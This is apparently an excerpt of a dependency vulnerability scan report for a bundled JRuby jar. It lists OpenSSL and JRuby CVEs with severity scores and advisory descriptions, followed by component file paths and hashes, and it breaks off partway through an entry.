The dtls1_clear_queues function in ssl/d1_lib.c in OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h frees data structures without considering that application data can arrive between a ChangeCipherSpec message and a Finished message, which allows remote DTLS peers to cause a denial of service (memory corruption and application crash) or possibly have unspecified other impact via unexpected application data.

Vulnerable Software & Versions:

CVE-2014-3572  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:P/A:N)
CWE: CWE-310 Cryptographic Issues

The ssl3_get_key_exchange function in s3_clnt.c in OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k allows remote SSL servers to conduct ECDHE-to-ECDH downgrade attacks and trigger a loss of forward secrecy by omitting the ServerKeyExchange message.

Vulnerable Software & Versions:

CVE-2014-3571  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)

OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a crafted DTLS message that is processed with a different read operation for the handshake header than for the handshake body, related to the dtls1_get_record function in d1_pkt.c and the ssl3_read_n function in s3_pkt.c.

Vulnerable Software & Versions:

CVE-2014-3570  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-310 Cryptographic Issues

The BN_sqr implementation in OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k does not properly calculate the square of a BIGNUM value, which might make it easier for remote attackers to defeat cryptographic protection mechanisms via unspecified vectors, related to crypto/bn/asm/mips.pl, crypto/bn/asm/x86_64-gcc.c, and crypto/bn/bn_asm.c.

Vulnerable Software & Versions:

CVE-2014-3568  

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
CWE: CWE-310 Cryptographic Issues

OpenSSL before 0.9.8zc, 1.0.0 before 1.0.0o, and 1.0.1 before 1.0.1j does not properly enforce the no-ssl3 build option, which allows remote attackers to bypass intended access restrictions via an SSL 3.0 handshake, related to s23_clnt.c and s23_srvr.c.

Vulnerable Software & Versions:

CVE-2014-3567  

Severity: High
CVSS Score: 7.1 (AV:N/AC:M/Au:N/C:N/I:N/A:C)
CWE: CWE-399 Resource Management Errors

Memory leak in the tls_decrypt_ticket function in t1_lib.c in OpenSSL before 0.9.8zc, 1.0.0 before 1.0.0o, and 1.0.1 before 1.0.1j allows remote attackers to cause a denial of service (memory consumption) via a crafted session ticket that triggers an integrity-check failure.

Vulnerable Software & Versions:

CVE-2014-3566  

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)
CWE: CWE-310 Cryptographic Issues

The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other products, uses nondeterministic CBC padding, which makes it easier for man-in-the-middle attackers to obtain cleartext data via a padding-oracle attack, aka the "POODLE" issue.

Vulnerable Software & Versions:

CVE-2014-3470  

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P)

The ssl3_send_client_key_exchange function in s3_clnt.c in OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h, when an anonymous ECDH cipher suite is used, allows remote attackers to cause a denial of service (NULL pointer dereference and client crash) by triggering a NULL certificate value.

Vulnerable Software & Versions:

CVE-2014-0224  

Severity: Medium
CVSS Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
CWE: CWE-310 Cryptographic Issues

OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly restrict processing of ChangeCipherSpec messages, which allows man-in-the-middle attackers to trigger use of a zero-length master key in certain OpenSSL-to-OpenSSL communications, and consequently hijack sessions or obtain sensitive information, via a crafted TLS handshake, aka the "CCS Injection" vulnerability.

Vulnerable Software & Versions:

CVE-2014-0221  

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P)
CWE: CWE-399 Resource Management Errors

The dtls1_get_message_fragment function in d1_both.c in OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h allows remote attackers to cause a denial of service (recursion and client crash) via a DTLS hello message in an invalid DTLS handshake.

Vulnerable Software & Versions:

CVE-2014-0195  

Severity: Medium
CVSS Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
CWE: CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer

The dtls1_reassemble_fragment function in d1_both.c in OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly validate fragment lengths in DTLS ClientHello messages, which allows remote attackers to execute arbitrary code or cause a denial of service (buffer overflow and application crash) via a long non-initial fragment.

Vulnerable Software & Versions:

CVE-2014-0076  

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)
CWE: CWE-310 Cryptographic Issues

The Montgomery ladder implementation in OpenSSL through 1.0.0l does not ensure that certain swap operations have a constant-time behavior, which makes it easier for local users to obtain ECDSA nonces via a FLUSH+RELOAD cache side-channel attack.

Vulnerable Software & Versions:

CVE-2013-6449  

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P)
CWE: CWE-310 Cryptographic Issues

The ssl_get_algorithm2 function in ssl/s3_lib.c in OpenSSL before 1.0.2 obtains a certain version number from an incorrect data structure, which allows remote attackers to cause a denial of service (daemon crash) via crafted traffic from a TLS 1.2 client.

Vulnerable Software & Versions:

CVE-2013-0169  

Severity: Low
CVSS Score: 2.6 (AV:N/AC:H/Au:N/C:P/I:N/A:N)
CWE: CWE-310 Cryptographic Issues

The TLS protocol 1.1 and 1.2 and the DTLS protocol 1.0 and 1.2, as used in OpenSSL, OpenJDK, PolarSSL, and other products, do not properly consider timing side-channel attacks on a MAC check requirement during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, aka the "Lucky Thirteen" issue.

Vulnerable Software & Versions:

CVE-2012-5370  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-310 Cryptographic Issues

JRuby computes hash values without properly restricting the ability to trigger hash collisions predictably, which allows context-dependent attackers to cause a denial of service (CPU consumption) via crafted input to an application that maintains a hash table, as demonstrated by a universal multicollision attack against the MurmurHash2 algorithm, a different vulnerability than CVE-2011-4838.

Vulnerable Software & Versions:

CVE-2012-2333  

Severity: Medium
CVSS Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
CWE: CWE-189 Numeric Errors

Integer underflow in OpenSSL before 0.9.8x, 1.0.0 before 1.0.0j, and 1.0.1 before 1.0.1c, when TLS 1.1, TLS 1.2, or DTLS is used with CBC encryption, allows remote attackers to cause a denial of service (buffer over-read) or possibly have unspecified other impact via a crafted TLS packet that is not properly handled during a certain explicit IV calculation.

Vulnerable Software & Versions:

CVE-2012-2110  

Severity: High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer

The asn1_d2i_read_bio function in crypto/asn1/a_d2i_fp.c in OpenSSL before 0.9.8v, 1.0.0 before 1.0.0i, and 1.0.1 before 1.0.1a does not properly interpret integer data, which allows remote attackers to conduct buffer overflow attacks, and cause a denial of service (memory corruption) or possibly have unspecified other impact, via crafted DER data, as demonstrated by an X.509 certificate or an RSA public key.

Vulnerable Software & Versions:

CVE-2012-1165  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-399 Resource Management Errors

The mime_param_cmp function in crypto/asn1/asn_mime.c in OpenSSL before 0.9.8u and 1.x before 1.0.0h allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a crafted S/MIME message, a different vulnerability than CVE-2006-7250.

Vulnerable Software & Versions:

CVE-2012-0884  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-310 Cryptographic Issues

The implementation of Cryptographic Message Syntax (CMS) and PKCS #7 in OpenSSL before 0.9.8u and 1.x before 1.0.0h does not properly restrict certain oracle behavior, which makes it easier for context-dependent attackers to decrypt data via a Million Message Attack (MMA) adaptive chosen ciphertext attack.

Vulnerable Software & Versions:

CVE-2012-0027  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-399 Resource Management Errors

The GOST ENGINE in OpenSSL before 1.0.0f does not properly handle invalid parameters for the GOST block cipher, which allows remote attackers to cause a denial of service (daemon crash) via crafted data from a TLS client.

Vulnerable Software & Versions:

CVE-2011-4838  

Severity: High
CVSS Score: 7.8 (AV:N/AC:L/Au:N/C:N/I:N/A:C)
CWE: CWE-20 Improper Input Validation

JRuby before 1.6.5.1 computes hash values without restricting the ability to trigger hash collisions predictably, which allows context-dependent attackers to cause a denial of service (CPU consumption) via crafted input to an application that maintains a hash table.

Vulnerable Software & Versions:

CVE-2011-4619  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-399 Resource Management Errors

The Server Gated Cryptography (SGC) implementation in OpenSSL before 0.9.8s and 1.x before 1.0.0f does not properly handle handshake restarts, which allows remote attackers to cause a denial of service (CPU consumption) via unspecified vectors.

Vulnerable Software & Versions:

CVE-2011-4577  

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P)
CWE: CWE-399 Resource Management Errors

OpenSSL before 0.9.8s and 1.x before 1.0.0f, when RFC 3779 support is enabled, allows remote attackers to cause a denial of service (assertion failure) via an X.509 certificate containing certificate-extension data associated with (1) IP address blocks or (2) Autonomous System (AS) identifiers.

Vulnerable Software & Versions:

CVE-2011-4576  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-310 Cryptographic Issues

The SSL 3.0 implementation in OpenSSL before 0.9.8s and 1.x before 1.0.0f does not properly initialize data structures for block cipher padding, which might allow remote attackers to obtain sensitive information by decrypting the padding data sent by an SSL peer.

Vulnerable Software & Versions:

CVE-2011-4354  

Severity: Medium
CVSS Score: 5.8 (AV:N/AC:M/Au:N/C:P/I:P/A:N)
CWE: CWE-310 Cryptographic Issues

crypto/bn/bn_nist.c in OpenSSL before 0.9.8h on 32-bit platforms, as used in stunnel and other products, in certain circumstances involving ECDH or ECDHE cipher suites, uses an incorrect modular reduction algorithm in its implementation of the P-256 and P-384 NIST elliptic curves, which allows remote attackers to obtain the private key of a TLS server via multiple handshake attempts.

Vulnerable Software & Versions:

CVE-2011-4108  

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)
CWE: CWE-310 Cryptographic Issues

The DTLS implementation in OpenSSL before 0.9.8s and 1.x before 1.0.0f performs a MAC check only if certain padding is valid, which makes it easier for remote attackers to recover plaintext via a padding oracle attack.

Vulnerable Software & Versions:

CVE-2011-1945  

Severity: Low
CVSS Score: 2.6 (AV:N/AC:H/Au:N/C:P/I:N/A:N)
CWE: CWE-310 Cryptographic Issues

The elliptic curve cryptography (ECC) subsystem in OpenSSL 1.0.0d and earlier, when the Elliptic Curve Digital Signature Algorithm (ECDSA) is used for the ECDHE_ECDSA cipher suite, does not properly implement curves over binary fields, which makes it easier for context-dependent attackers to determine private keys via a timing attack and a lattice calculation.

Vulnerable Software & Versions:

CVE-2011-1473  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-264 Permissions, Privileges, and Access Controls

** DISPUTED ** OpenSSL before 0.9.8l, and 0.9.8m through 1.x, does not properly restrict client-initiated renegotiation within the SSL and TLS protocols, which might make it easier for remote attackers to cause a denial of service (CPU consumption) by performing many renegotiations within a single connection, a different vulnerability than CVE-2011-5094. NOTE: it can also be argued that it is the responsibility of server deployments, not a security library, to prevent or limit renegotiation when it is inappropriate within a specific environment.

Vulnerable Software & Versions:

CVE-2010-5298  

Severity: Medium
CVSS Score: 4.0 (AV:N/AC:H/Au:N/C:N/I:P/A:P)
CWE: CWE-362 Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')

Race condition in the ssl3_read_bytes function in s3_pkt.c in OpenSSL through 1.0.1g, when SSL_MODE_RELEASE_BUFFERS is enabled, allows remote attackers to inject data across sessions or cause a denial of service (use-after-free and parsing error) via an SSL connection in a multithreaded environment.

Vulnerable Software & Versions:

CVE-2010-4252  

Severity: High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-287 Improper Authentication

OpenSSL before 1.0.0c, when J-PAKE is enabled, does not properly validate the public parameters in the J-PAKE protocol, which allows remote attackers to bypass the need for knowledge of the shared secret, and successfully authenticate, by sending crafted values in each round of the protocol.

Vulnerable Software & Versions:

CVE-2010-4180  

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)

OpenSSL before 0.9.8q, and 1.0.x before 1.0.0c, when SSL_OP_NETSCAPE_REUSE_CIPHER_CHANGE_BUG is enabled, does not properly prevent modification of the ciphersuite in the session cache, which allows remote attackers to force the downgrade to an unintended cipher via vectors involving sniffing network traffic to discover a session identifier.

Vulnerable Software & Versions:

CVE-2010-1330  

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
CWE: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

The regular expression engine in JRuby before 1.4.1, when $KCODE is set to 'u', does not properly handle characters immediately after a UTF-8 character, which allows remote attackers to conduct cross-site scripting (XSS) attacks via a crafted string.

Vulnerable Software & Versions:

CVE-2010-0742  

Severity: High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-310 Cryptographic Issues

The Cryptographic Message Syntax (CMS) implementation in crypto/cms/cms_asn1.c in OpenSSL before 0.9.8o and 1.x before 1.0.0a does not properly handle structures that contain OriginatorInfo, which allows context-dependent attackers to modify invalid memory locations or conduct double-free attacks, and possibly execute arbitrary code, via unspecified vectors.

Vulnerable Software & Versions:

CVE-2010-0433  

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P)
CWE: CWE-20 Improper Input Validation

The kssl_keytab_is_available function in ssl/kssl.c in OpenSSL before 0.9.8n, when Kerberos is enabled but Kerberos configuration files cannot be opened, does not check a certain return value, which allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via SSL cipher negotiation, as demonstrated by a chroot installation of Dovecot or stunnel without Kerberos configuration files inside the chroot.

Vulnerable Software & Versions:

CVE-2009-4355  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-399 Resource Management Errors

Memory leak in the zlib_stateful_finish function in crypto/comp/c_zlib.c in OpenSSL 0.9.8l and earlier and 1.0.0 Beta through Beta 4 allows remote attackers to cause a denial of service (memory consumption) via vectors that trigger incorrect calls to the CRYPTO_cleanup_all_ex_data function, as demonstrated by use of SSLv3 and PHP with the Apache HTTP Server, a related issue to CVE-2008-1678.

Vulnerable Software & Versions:

CVE-2009-3555  

Severity: Medium
CVSS Score: 5.8 (AV:N/AC:M/Au:N/C:N/I:P/A:P)
CWE: CWE-310 Cryptographic Issues

The TLS protocol, and the SSL protocol 3.0 and possibly earlier, as used in Microsoft Internet Information Services (IIS) 7.0, mod_ssl in the Apache HTTP Server 2.2.14 and earlier, OpenSSL before 0.9.8l, GnuTLS 2.8.5 and earlier, Mozilla Network Security Services (NSS) 3.12.4 and earlier, multiple Cisco products, and other products, does not properly associate renegotiation handshakes with an existing connection, which allows man-in-the-middle attackers to insert data into HTTPS sessions, and possibly other types of sessions protected by TLS or SSL, by sending an unauthenticated request that is processed retroactively by a server in a post-renegotiation context, related to a "plaintext injection" attack, aka the "Project Mogul" issue.

Vulnerable Software & Versions:

CVE-2009-3245  

Severity: High
CVSS Score: 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)
CWE: CWE-20 Improper Input Validation

OpenSSL before 0.9.8m does not check for a NULL return value from bn_wexpand function calls in (1) crypto/bn/bn_div.c, (2) crypto/bn/bn_gf2m.c, (3) crypto/ec/ec2_smpl.c, and (4) engines/e_ubsec.c, which has unspecified impact and context-dependent attack vectors.

Vulnerable Software & Versions:

CVE-2009-1387  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-399 Resource Management Errors

The dtls1_retrieve_buffered_fragment function in ssl/d1_both.c in OpenSSL before 1.0.0 Beta 2 allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via an out-of-sequence DTLS handshake message, related to a "fragment bug."

Vulnerable Software & Versions:

CVE-2009-1378  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-399 Resource Management Errors

Multiple memory leaks in the dtls1_process_out_of_seq_message function in ssl/d1_both.c in OpenSSL 0.9.8k and earlier 0.9.8 versions allow remote attackers to cause a denial of service (memory consumption) via DTLS records that (1) are duplicates or (2) have sequence numbers much greater than current sequence numbers, aka "DTLS fragment handling memory leak."

Vulnerable Software & Versions:

CVE-2009-1377  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer

The dtls1_buffer_record function in ssl/d1_pkt.c in OpenSSL 0.9.8k and earlier 0.9.8 versions allows remote attackers to cause a denial of service (memory consumption) via a large series of "future epoch" DTLS records that are buffered in a queue, aka "DTLS record buffer limitation bug."

Vulnerable Software & Versions:

CVE-2009-0789  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-189 Numeric Errors

OpenSSL before 0.9.8k on WIN64 and certain other platforms does not properly handle a malformed ASN.1 structure, which allows remote attackers to cause a denial of service (invalid memory access and application crash) by placing this structure in the public key of a certificate, as demonstrated by an RSA public key.

Vulnerable Software & Versions:

CVE-2009-0590  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer

The ASN1_STRING_print_ex function in OpenSSL before 0.9.8k allows remote attackers to cause a denial of service (invalid memory access and application crash) via vectors that trigger printing of a (1) BMPString or (2) UniversalString with an invalid encoded length.

Vulnerable Software & Versions:

CVE-2008-7270  

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
CWE: CWE-310 Cryptographic Issues

OpenSSL before 0.9.8j, when SSL_OP_NETSCAPE_REUSE_CIPHER_CHANGE_BUG is enabled, does not prevent modification of the ciphersuite in the session cache, which allows remote attackers to force the use of a disabled cipher via vectors involving sniffing network traffic to discover a session identifier, a different vulnerability than CVE-2010-4180.

Vulnerable Software & Versions:

CVE-2008-5077  

Severity: Medium
CVSS Score: 5.8 (AV:N/AC:M/Au:N/C:N/I:P/A:P)
CWE: CWE-20 Improper Input Validation

OpenSSL 0.9.8i and earlier does not properly check the return value from the EVP_VerifyFinal function, which allows remote attackers to bypass validation of the certificate chain via a malformed SSL/TLS signature for DSA and ECDSA keys.

Vulnerable Software & Versions:

CVE-2007-5536  

Severity: Medium
CVSS Score: 4.9 (AV:L/AC:L/Au:N/C:N/I:N/A:C)

Unspecified vulnerability in OpenSSL before A.00.09.07l on HP-UX B.11.11, B.11.23, and B.11.31 allows local users to cause a denial of service via unspecified vectors.

Vulnerable Software & Versions:

CVE-2007-3108  

Severity: Low
CVSS Score: 1.2 (AV:L/AC:H/Au:N/C:P/I:N/A:N)

The BN_from_montgomery function in crypto/bn/bn_mont.c in OpenSSL 0.9.8e and earlier does not properly perform Montgomery multiplication, which might allow local users to conduct a side-channel attack and retrieve RSA private keys.

Vulnerable Software & Versions:

CVE-2006-7250  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)

The mime_hdr_cmp function in crypto/asn1/asn_mime.c in OpenSSL 0.9.8t and earlier allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a crafted S/MIME message.

Vulnerable Software & Versions:

CVE-2006-4343  

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P)

The get_server_hello function in the SSLv2 client code in OpenSSL 0.9.7 before 0.9.7l, 0.9.8 before 0.9.8d, and earlier versions allows remote servers to cause a denial of service (client crash) via unknown vectors that trigger a null pointer dereference.

Vulnerable Software & Versions:

CVE-1999-0428  

Severity: High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)

OpenSSL and SSLeay allow remote attackers to reuse SSL sessions and bypass access controls.

Vulnerable Software & Versions:

jruby-complete-9.1.2.0.jar: json-1.8.3-java.gemspec

File Path: /var/tmp/maven-repo/org/jruby/jruby-complete/9.1.2.0/jruby-complete-9.1.2.0.jar/META-INF/jruby.home/lib/ruby/gems/shared/specifications/default/json-1.8.3-java.gemspec
MD5: 5eaf31c5d0da0413ad7f4005be3b4a18
SHA1: 24c9ba6aa50489aeb4ff2b16dc4b6920f0f84aeb

Identifiers

  • cpe: cpe:/a:jruby:jruby:1.8.3   Confidence: LOW

CVE-2012-5370  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-310 Cryptographic Issues

JRuby computes hash values without properly restricting the ability to trigger hash collisions predictably, which allows context-dependent attackers to cause a denial of service (CPU consumption) via crafted input to an application that maintains a hash table, as demonstrated by a universal multicollision attack against the MurmurHash2 algorithm, a different vulnerability than CVE-2011-4838.

Vulnerable Software & Versions:

jruby-complete-9.1.2.0.jar: minitest-5.4.1.gemspec

File Path: /var/tmp/maven-repo/org/jruby/jruby-complete/9.1.2.0/jruby-complete-9.1.2.0.jar/META-INF/jruby.home/lib/ruby/gems/shared/specifications/default/minitest-5.4.1.gemspec
MD5: cad713d13ea10dca1d3d301ae89095b6
SHA1: 77e07c04707da19fea9367e20c98ad4b0213940b

Identifiers

  • None

jruby-complete-9.1.2.0.jar: net-telnet-0.1.1.gemspec

File Path: /var/tmp/maven-repo/org/jruby/jruby-complete/9.1.2.0/jruby-complete-9.1.2.0.jar/META-INF/jruby.home/lib/ruby/gems/shared/specifications/default/net-telnet-0.1.1.gemspec
MD5: 2dbf210f06ee958d06e7ad1c7dab6874
SHA1: 94fc59346cc5b058176b94037b877ad3b5d254b4

Identifiers

  • None

jruby-complete-9.1.2.0.jar: power_assert-0.2.3.gemspec

File Path: /var/tmp/maven-repo/org/jruby/jruby-complete/9.1.2.0/jruby-complete-9.1.2.0.jar/META-INF/jruby.home/lib/ruby/gems/shared/specifications/default/power_assert-0.2.3.gemspec
MD5: b9c7fd8616868906ed899dfc029bde5f
SHA1: 739561c3ce5a183b8bca344cbb07b5e2280db198

Identifiers

  • None

jruby-complete-9.1.2.0.jar: psych-2.0.17-java.gemspec

File Path: /var/tmp/maven-repo/org/jruby/jruby-complete/9.1.2.0/jruby-complete-9.1.2.0.jar/META-INF/jruby.home/lib/ruby/gems/shared/specifications/default/psych-2.0.17-java.gemspec
MD5: f9d0bafe90a629f61c13b896b83d4b89
SHA1: 9015c344519591012da277050d208cdbacf7f210

Identifiers

  • None

jruby-complete-9.1.2.0.jar: racc-1.4.13-java.gemspec

File Path: /var/tmp/maven-repo/org/jruby/jruby-complete/9.1.2.0/jruby-complete-9.1.2.0.jar/META-INF/jruby.home/lib/ruby/gems/shared/specifications/default/racc-1.4.13-java.gemspec
MD5: 73a6e8098118cdbcf985bfe577a793cc
SHA1: 3686e655c90c083a9c8c8a40bfa66d346048afbb

Identifiers

  • None

jruby-complete-9.1.2.0.jar: rake-10.4.2.gemspec

File Path: /var/tmp/maven-repo/org/jruby/jruby-complete/9.1.2.0/jruby-complete-9.1.2.0.jar/META-INF/jruby.home/lib/ruby/gems/shared/specifications/default/rake-10.4.2.gemspec
MD5: b65000317e704ddebc33513f09d00c7b
SHA1: 0adcc512220c493a50fdd13e48b49d09f6331f16

Identifiers

  • None

jruby-complete-9.1.2.0.jar: rdoc-4.2.0.gemspec

File Path: /var/tmp/maven-repo/org/jruby/jruby-complete/9.1.2.0/jruby-complete-9.1.2.0.jar/META-INF/jruby.home/lib/ruby/gems/shared/specifications/default/rdoc-4.2.0.gemspec
MD5: e7cfbce03b095e6c28d50fe5400b3ed6
SHA1: 8070e3c86e978a6ad7383b9ac6f1c534662d9160

Identifiers

  • cpe: cpe:/a:dave_thomas:rdoc:4.2.0   Confidence: LOW

jruby-complete-9.1.2.0.jar: test-unit-3.1.1.gemspec

File Path: /var/tmp/maven-repo/org/jruby/jruby-complete/9.1.2.0/jruby-complete-9.1.2.0.jar/META-INF/jruby.home/lib/ruby/gems/shared/specifications/default/test-unit-3.1.1.gemspec
MD5: af9719b6b8922c3dbdd115b3bdf133ff
SHA1: 2e060d376279be4bca0616b85a37e5ede51585b1

Identifiers

  • None

jruby-complete-9.1.2.0.jar: Rakefile

File Path: /var/tmp/maven-repo/org/jruby/jruby-complete/9.1.2.0/jruby-complete-9.1.2.0.jar/META-INF/jruby.home/lib/ruby/stdlib/ffi/tools/Rakefile
MD5: 0f5f4d1794d04c02252221ba8a1465a5
SHA1: c37abced3b762a0d4c39043b897ca4043bd227ad

Identifiers

  • None

jruby-complete-9.1.2.0.jar: jline-2.11.jar

Description: Sonatype helps open source projects to set up Maven repositories on https://oss.sonatype.org/

License:

The BSD License: http://www.opensource.org/licenses/bsd-license.php
File Path: /var/tmp/maven-repo/org/jruby/jruby-complete/9.1.2.0/jruby-complete-9.1.2.0.jar/META-INF/jruby.home/lib/ruby/stdlib/jline/jline/2.11/jline-2.11.jar
MD5: aa66f14587f87eb6fc19aa728925dd64
SHA1: 9504d5e2da5d78237239c5226e8200ec21182040

Identifiers

jruby-complete-9.1.2.0.jar: jline-2.11.jar: jansi.dll

File Path: /var/tmp/maven-repo/org/jruby/jruby-complete/9.1.2.0/jruby-complete-9.1.2.0.jar/META-INF/jruby.home/lib/ruby/stdlib/jline/jline/2.11/jline-2.11.jar/META-INF/native/windows32/jansi.dll
MD5: 1e56641bb68937f8e2020cbff5d04a08
SHA1: 97f6e12599bb5848867b9762184d055ed918ab2a

Identifiers

  • None

jruby-complete-9.1.2.0.jar: jline-2.11.jar: jansi.dll

File Path: /var/tmp/maven-repo/org/jruby/jruby-complete/9.1.2.0/jruby-complete-9.1.2.0.jar/META-INF/jruby.home/lib/ruby/stdlib/jline/jline/2.11/jline-2.11.jar/META-INF/native/windows64/jansi.dll
MD5: fd3a20891286c958103f3ea07174cd3c
SHA1: 829195c9e338d5725cf304ae33fc209db53884eb

Identifiers

  • None

jruby-complete-9.1.2.0.jar: joda-time-2.3.jar

Description: Date and time library to replace JDK date handling

License:

Apache 2: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/tmp/maven-repo/org/jruby/jruby-complete/9.1.2.0/jruby-complete-9.1.2.0.jar/META-INF/jruby.home/lib/ruby/stdlib/joda-time/joda-time/2.3/joda-time-2.3.jar
MD5: ff85fe8f3ab26b36092475a95f43fb7e
SHA1: 56498efd17752898cfcc3868c1b6211a07b12b8f

Identifiers

jruby-complete-9.1.2.0.jar: jopenssl.jar

Description: JRuby-OpenSSL is an add-on gem for JRuby that emulates the Ruby OpenSSL native library.

License:

EPL-1.0: http://opensource.org/licenses/EPL-1.0
GPL-2.0: http://opensource.org/licenses/GPL-2.0
LGPL-2.1: http://opensource.org/licenses/LGPL-2.1
File Path: /var/tmp/maven-repo/org/jruby/jruby-complete/9.1.2.0/jruby-complete-9.1.2.0.jar/META-INF/jruby.home/lib/ruby/stdlib/jopenssl.jar
MD5: 596d80b14850ac04414440044fec737a
SHA1: 44f8593131edf0d6cdd2c3bbd0fd317e611ab5f1

Identifiers

  • cpe: cpe:/a:jruby:jruby:0.9.15   Confidence: LOW
  • cpe: cpe:/a:openssl:openssl:0.9.15   Confidence: LOW
  • maven: rubygems:jruby-openssl:0.9.15   Confidence: HIGH

CVE-2016-2176  

Severity: Medium
CVSS Score: 6.4 (AV:N/AC:L/Au:N/C:P/I:N/A:P)
CWE: CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer

The X509_NAME_oneline function in crypto/x509/x509_obj.c in OpenSSL before 1.0.1t and 1.0.2 before 1.0.2h allows remote attackers to obtain sensitive information from process stack memory or cause a denial of service (buffer over-read) via crafted EBCDIC ASN.1 data.

Vulnerable Software & Versions:

CVE-2016-2109  

Severity: High
CVSS Score: 7.8 (AV:N/AC:L/Au:N/C:N/I:N/A:C)
CWE: CWE-399 Resource Management Errors

The asn1_d2i_read_bio function in crypto/asn1/a_d2i_fp.c in the ASN.1 BIO implementation in OpenSSL before 1.0.1t and 1.0.2 before 1.0.2h allows remote attackers to cause a denial of service (memory consumption) via a short invalid encoding.

Vulnerable Software & Versions:

CVE-2016-2108  

Severity: High
CVSS Score: 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)
CWE: CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer

The ASN.1 implementation in OpenSSL before 1.0.1o and 1.0.2 before 1.0.2c allows remote attackers to execute arbitrary code or cause a denial of service (buffer underflow and memory corruption) via an ANY field in crafted serialized data, aka the "negative zero" issue.

Vulnerable Software & Versions:

CVE-2016-2107  

Severity: Low
CVSS Score: 2.6 (AV:N/AC:H/Au:N/C:P/I:N/A:N)
